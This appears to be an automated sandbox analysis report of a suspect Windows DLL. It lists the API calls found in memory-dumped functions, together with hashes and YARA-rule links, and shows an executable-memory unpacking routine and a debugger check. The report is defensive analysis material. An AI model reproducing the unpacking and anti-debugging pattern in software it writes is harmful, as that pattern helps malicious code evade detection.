Instruction Fuzzy Hash: 6FE1D0B290060DBEEF12CAF0CC45DFFB7BDEB04748F44092AB655E3450EA71AA459760

Uniqueness

Uniqueness Score: -1.00%

Function 6E20434D, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000984,00003000,00000040,00000984,6E203DA0), ref: 6E20440A
VirtualAlloc.KERNEL32(00000000,000000A9,00003000,00000040,6E203DFF), ref: 6E204441
VirtualAlloc.KERNEL32(00000000,00014055,00003000,00000040), ref: 6E2044A1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2044D7
VirtualProtect.KERNEL32(6E1A0000,00000000,00000004,6E20432C), ref: 6E2045DC
VirtualProtect.KERNEL32(6E1A0000,00001000,00000004,6E20432C), ref: 6E204603
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C), ref: 6E2046D0
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C,?), ref: 6E204726
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E204742

Memory Dump Source

Source File: 00000006.00000002.440526959.000000006E203000.00000040.00020000.sdmp, Offset: 6E203000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction ID: daca50e72d554e6f2bda88c07d6aad315520f13b274166a7ba2db3b46f3f6995
Opcode Fuzzy Hash: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction Fuzzy Hash: E9D192F6500602DFDB11DF54C8A0BB177A6FF9A350B1941B5ED099F29AD770B801CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD1F0, Relevance: 9.5, APIs: 6, Instructions: 492COMMON

Download Yara Rule

APIs

std::locale::locale.LIBCPMTD ref: 6E1CD22B

Part of subcall function 6E1CE190: std::locale::_Init.LIBCPMT ref: 6E1CE197
Part of subcall function 6E1CE190: std::locale::facet::_Incref.LIBCPMTD ref: 6E1CE1A8

_setlocale.LIBCMT ref: 6E1CD251
SetConsoleOutputCP.KERNEL32(000004E3), ref: 6E1CD272
GetTempPathA.KERNEL32(00000550,6E2037E0), ref: 6E1CD2AF
SetConsoleCP.KERNEL32(00000000), ref: 6E1CD30C
GetWindowsDirectoryA.KERNEL32(6E298C60,00000550), ref: 6E1CD3EC

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Console$DirectoryIncrefInitOutputPathTempWindows_setlocalestd::locale::_std::locale::facet::_std::locale::locale
String ID:
API String ID: 3520124897-0
Opcode ID: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction ID: 4c2df5d4404c3fa1fe948e823e49738ea069e064c9d20e8c68642c6207f55174
Opcode Fuzzy Hash: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction Fuzzy Hash: 2D3228B2E00619CFDB08CFA8D588AADBBB3FB69704F10811ED505A7285D7746A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA260, Relevance: 5.7, APIs: 1, Strings: 1, Instructions: 2181COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000550,?,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000022,00000000,6E202008,6E20200C), ref: 6E1CBB39

Strings

^, xrefs: 6E1CBA5F

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: PathTemp
String ID: ^
API String ID: 2920410445-1590793086
Opcode ID: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction ID: 6e746a0985220d5da548d07382223b66a8a09577f7db703cf7d906aef81ff1ee
Opcode Fuzzy Hash: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction Fuzzy Hash: 31233BF2A00B20CFEB18CF68C598A6577B3B7AA704B05C21FD509972C6D6B45A84DF71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DCBB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E1D6C97,?), ref: 6E1DCBC6

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction ID: 820333205368eae30f854d8f122d52634dc1706d08cd2fea688c312134bb87b7
Opcode Fuzzy Hash: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction Fuzzy Hash: E5D05EB2AA47495EDF005EB6A80DB623BECF3857A5F108835B91DC6144E675C941DA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAC71, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6E1DAC73

Part of subcall function 6E1DABFF: RtlEncodePointer.NTDLL(00000000,?,6E1DAC78,00000000,6E1E5A67,6E29A270,00000000,00000314,?,6E1DD0DA,6E29A270,6E1FE438,00012010), ref: 6E1DAC66

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: c0ec3df7dfb2676b3eabd7b2e1e64625d98d1eb03a23cc5d0fa29abd07860359
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1D4FB4, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1DBEF3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1DBF08
UnhandledExceptionFilter.KERNEL32(6E1FDEAC), ref: 6E1DBF13
GetCurrentProcess.KERNEL32(C0000409), ref: 6E1DBF2F
TerminateProcess.KERNEL32(00000000), ref: 6E1DBF36

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction ID: e239c2e4e972f70165b1d4545fc472ad3b7e12bca548073ce95aba2cb4bf68fa
Opcode Fuzzy Hash: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction Fuzzy Hash: 5821F4B5415B04DFDF51DF7AC48C6983BB6BB0A325F10A01BE48987350E7B159A5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAD66, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E200C28,0000000C,6E1DAEA1,00000000,00000000,?,6E1CC9C7,6E1D8C30,6E1D50D1,?,?,6E1CC9C7,0000041D), ref: 6E1DAD78
__crt_waiting_on_module_handle.LIBCMT ref: 6E1DAD83

Part of subcall function 6E1DCC55: Sleep.KERNEL32(000003E8,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC61
Part of subcall function 6E1DCC55: GetModuleHandleW.KERNEL32(6E1CC9C7,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC6A

__lock.LIBCMT ref: 6E1DADDE
InterlockedIncrement.KERNEL32(207CA16E), ref: 6E1DADEB
__lock.LIBCMT ref: 6E1DADFF
___addlocaleref.LIBCMT ref: 6E1DAE1D

Strings

KERNEL32.DLL, xrefs: 6E1DAD72, 6E1DAD77, 6E1DAD82

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction ID: 3afaf870f58e490e8322f7e58af8c73fc95c5d0ef1a7f59ac73937ae6c2eb39b
Opcode Fuzzy Hash: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction Fuzzy Hash: 17118E71800B01DBD760DFF5C804B9EBBF9AF04314F20891AE4AAA7290CB74A985EB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D2490, Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D2680: _localeconv.LIBCMT ref: 6E1D2687

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D24F6

Part of subcall function 6E1D2740: _strlen.LIBCMT ref: 6E1D274A

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2526
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D255E
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25BD
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25E3
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2612
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2634
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2653

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
String ID:
API String ID: 3869368768-0
Opcode ID: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction ID: 9d7816aefc557e95226af2557501fead26d0dc5e5da37e7f149edd8d75877735
Opcode Fuzzy Hash: 149c5aae32532379ee9ab7c12b45de861af977d4f4e61cc160fd932d2147254c
Instruction Fuzzy Hash: DB510DB5E00248EFDB14CFD4C850BDEBBB9BF49314F108529E819AB385D731A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6FEA, Relevance: 12.1, APIs: 8, Instructions: 77COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 6E1D6FF9
__decode_pointer.LIBCMT ref: 6E1D7009

Part of subcall function 6E1DAC7A: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DACB9
Part of subcall function 6E1DAC7A: __crt_waiting_on_module_handle.LIBCMT ref: 6E1DACC4
Part of subcall function 6E1DAC7A: GetProcAddress.KERNEL32(00000000,6E1FDE6C), ref: 6E1DACD4

__msize.LIBCMT ref: 6E1D7027
__realloc_crt.LIBCMT ref: 6E1D704B
__realloc_crt.LIBCMT ref: 6E1D7061
__encode_pointer.LIBCMT ref: 6E1D7073
__encode_pointer.LIBCMT ref: 6E1D7081
__encode_pointer.LIBCMT ref: 6E1D708C

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
String ID:
API String ID: 1462085885-0
Opcode ID: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction ID: 2d3159ee4e6a9cbf5a2163ca0c512ce6c3ef675c20a20a4ec499b8c3cbe86f92
Opcode Fuzzy Hash: 421d13213a38d08f73429c71f647deb47a7df6cb4f2de4072cd0c2b31683ce71
Instruction Fuzzy Hash: 3311D67360461AAFAB15DBB9DC548DD3BEEFA422A47240427E404D71D0FF22DDC9A650

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3DFC, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3E03
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3E0D
int.LIBCPMTD ref: 6E1D3E24

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

codecvt.LIBCPMT ref: 6E1D3E47
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3E5B
__CxxThrowException@8.LIBCMT ref: 6E1D3E69
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3E79
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3E7F

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1213051545-0
Opcode ID: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction ID: 0871e79236cb69b46e38c73c00404bde10ecb0da6678f626a65ca2006bb922e2
Opcode Fuzzy Hash: 9ffca47bd1bbfc1de682883c1986158b910516e165fd9dd4921d0e22ea5e74d3
Instruction Fuzzy Hash: 980165318005199BCF05DBE0C855AEEB33EBF90628F640919D121AB2D0DF789A8AF791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3BDD, Relevance: 12.0, APIs: 8, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D3BE4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1D3BEE
int.LIBCPMTD ref: 6E1D3C05

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

ctype.LIBCPMT ref: 6E1D3C28
std::bad_exception::bad_exception.LIBCMT ref: 6E1D3C3C
__CxxThrowException@8.LIBCMT ref: 6E1D3C4A
std::locale::facet::_Incref.LIBCPMTD ref: 6E1D3C5A
std::locale::facet::facet_Register.LIBCPMT ref: 6E1D3C60

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$Exception@8H_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 1593823581-0
Opcode ID: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction ID: 5c0dd25bdb36a49be9b0b5ea46e723c9460e4cdf0d8514f21aeac28b5bf3f8c4
Opcode Fuzzy Hash: c92916f1788c7eb43e247fd3a3f036f4c395539a8fb6de3a81ba5cd6edeada9c
Instruction Fuzzy Hash: 1F0184728005199BCB05DBE4C945AEEB33EBF50768F600919D020AB2D0DF749ACAF791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CE8B0, Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6E1CE912

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction ID: 3cec50ac69d8f08296cdc263d1917b6385b913009a3c50e9b72b2c4d9d3a3280
Opcode Fuzzy Hash: 10059899d56e9d594106df0b1951fb06e436ed501da2cabf923a2b67adfcdf17
Instruction Fuzzy Hash: A3415B71810518DFDB14CBD4CC92FEDF375BB24714F108A9A941AAB284DB34AB85DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8290, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6E1D82B8

Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D643F
Part of subcall function 6E1D6431: __getptd.LIBCMT ref: 6E1D644D

__getptd.LIBCMT ref: 6E1D82C2

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D82D0
__getptd.LIBCMT ref: 6E1D82DE
__getptd.LIBCMT ref: 6E1D82E9
_CallCatchBlock2.LIBCMT ref: 6E1D830F

Part of subcall function 6E1D64D6: __CallSettingFrame@12.LIBCMT ref: 6E1D6522

Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83C5
Part of subcall function 6E1D83B6: __getptd.LIBCMT ref: 6E1D83D3

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction ID: f865f345b9e65ab562136507cde0884e38f78843ff439cc5d87033569feee633
Opcode Fuzzy Hash: d4d9ddd75267794bb2dc1c8719d77f810e5e24a8f0620d045c8e4b5e46c92a64
Instruction Fuzzy Hash: 7411A7B1C00209DFDB01DFE4C544AEE7BB9FF04318F108969E814A7250EB789A59EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1700, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D172F

Part of subcall function 6E1CE4D0: std::locale::locale.LIBCPMTD ref: 6E1CE4EA

Part of subcall function 6E1D1F70: std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
Part of subcall function 6E1D1F70: int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CE200: std::locale::facet::_Decref.LIBCPMTD ref: 6E1CE216

numpunct.LIBCPMTD ref: 6E1D1769
_memmove_s.LIBCMT ref: 6E1D1868
std::ios_base::width.LIBCPMTD ref: 6E1D19DA

Strings

@, xrefs: 6E1D18E1

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: DecrefLockitLockit::__memmove_snumpunctstd::_std::ios_base::getlocstd::ios_base::widthstd::locale::facet::_std::locale::locale
String ID: @
API String ID: 3659140288-2766056989
Opcode ID: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction ID: cf9427d85de8a056804b0bf8f891f0c487a5ee7b30a7c21ff13fcb4322b78fef
Opcode Fuzzy Hash: d7c9a8195c05875df4850439fb9ce50fd5352511f08eb7f2e3fb56595c7d5fd5
Instruction Fuzzy Hash: 65B13B71A041499FCB04CF98C990AEEBBFABF49304F20865DE919A7351D734A985DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1F70, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction ID: ccea0a8057b824492fa47db9ff6d2e4a4bde780ed4dc4b1144d1ef4d6f43785d
Opcode Fuzzy Hash: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction Fuzzy Hash: B8311CB1D10109DFCB04CFE4D850BEEB7B5FB59714F108A1AE425A7390DB345989EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFCD0, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFCFA
int.LIBCPMTD ref: 6E1CFD13

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction ID: bab263128bf03b5b9a7bf6c962b692163821b0dd6801522b288fdf473b04f104
Opcode Fuzzy Hash: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction Fuzzy Hash: B1314DB1D00149DFCB04CFE4D840BEEB7B5FB58718F108A1AE425A7380DB385A85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDF38, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1DDF44

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__amsg_exit.LIBCMT ref: 6E1DDF64
__lock.LIBCMT ref: 6E1DDF74
InterlockedDecrement.KERNEL32(?), ref: 6E1DDF91
InterlockedIncrement.KERNEL32(6E203218), ref: 6E1DDFBC

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction ID: de6c65fc89f4aaa300a8de46f1e1d2af3e81907594e21641e1e1875de4f53395
Opcode Fuzzy Hash: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction Fuzzy Hash: 22018472904A16EBDB61EFE48454BCEB374BF15719F214606E810A7284C73469CAEFE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7128, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6E1D7146

Part of subcall function 6E1DC0BA: __mtinitlocknum.LIBCMT ref: 6E1DC0D0
Part of subcall function 6E1DC0BA: __amsg_exit.LIBCMT ref: 6E1DC0DC
Part of subcall function 6E1DC0BA: RtlEnterCriticalSection.NTDLL(?), ref: 6E1DC0E4

___sbh_find_block.LIBCMT ref: 6E1D7151
___sbh_free_block.LIBCMT ref: 6E1D7160
HeapFree.KERNEL32(00000000,6E1CC9C7,6E2009A0,0000000C,6E1DC09B,00000000,6E200CD8,0000000C,6E1DC0D5,6E1CC9C7,?,?,6E1E42CF,00000004,6E200F18,0000000C), ref: 6E1D7190
GetLastError.KERNEL32(?,6E1E42CF,00000004,6E200F18,0000000C,6E1D9A60,6E1CC9C7,?,00000000,00000000,00000000,?,6E1DAE78,00000001,00000214), ref: 6E1D71A1

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction ID: f9d175c56f9ab3eef83f1b6ab816cf69f5020d254cf8306f4dc02deeb54fbb4f
Opcode Fuzzy Hash: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction Fuzzy Hash: B2016771805716EBDF21AFF19809BDE3668AF02765F204A06E414AA1C4CB3895C8FEA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0930, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0B10

Strings

$, xrefs: 6E1D098E
l, xrefs: 6E1D0949
$, xrefs: 6E1D0994

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction ID: 492511245ebe254a7002a083bc2b85a16b184c9dd2ee9e70f2fdb1dfabd7f368
Opcode Fuzzy Hash: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction Fuzzy Hash: 73618D7090060DDFDF04CF94D954BDEBBB9FF85300F008188E599A2281EB789AA9DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0B70, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0D39

Strings

$, xrefs: 6E1D0BCE
$, xrefs: 6E1D0BD4
l, xrefs: 6E1D0B89

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction ID: e8f4bc2df14076b5fcd6d870665b7f11dfdaf01eba6886853da5e6df6e990ac2
Opcode Fuzzy Hash: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction Fuzzy Hash: BD518A7090460DDFDB14CF94D954BEEBBB9FF49304F4080C9E898A2280DB389AA8DF55

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5373, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6E1D5385
___removelocaleref.LIBCMT ref: 6E1D5390
___freetlocinfo.LIBCMT ref: 6E1D53A4

Part of subcall function 6E1D50DC: ___free_lconv_mon.LIBCMT ref: 6E1D5122
Part of subcall function 6E1D50DC: ___free_lconv_num.LIBCMT ref: 6E1D5143
Part of subcall function 6E1D50DC: ___free_lc_time.LIBCMT ref: 6E1D51C8

Strings

8, n, xrefs: 6E1D539B

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: 8, n
API String ID: 4212647719-436394027
Opcode ID: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction ID: 911413bb0842dad2cc0b7a207cff4fd2fe98fd411f03afb68dae07f87718ae34
Opcode Fuzzy Hash: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction Fuzzy Hash: 58E0DF23905C22E9C69115DCA4503AF63A9DFA2711B32040AE860AB048DBA0CCCC7190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0460, Relevance: 6.2, APIs: 4, Instructions: 188COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D04E2
numpunct.LIBCPMTD ref: 6E1D053F

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: numpunctstd::ios_base::getloc
String ID:
API String ID: 1901892925-0
Opcode ID: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction ID: c21d47d5ae941d74f5e4d546c88061d539d344908803ea8327f1dff19b171ecd
Opcode Fuzzy Hash: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction Fuzzy Hash: 9A8160B19001589FCB04CFA8C951BEEBBB9BF58304F108598F519E7290DB34AE84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D78CF, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 6E1D7993
__fileno.LIBCMT ref: 6E1D79B3
__locking.LIBCMT ref: 6E1D79BA
__flsbuf.LIBCMT ref: 6E1D79E5

Part of subcall function 6E1D8C2B: __getptd_noexit.LIBCMT ref: 6E1D8C2B

Part of subcall function 6E1D6B47: __decode_pointer.LIBCMT ref: 6E1D6B52

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
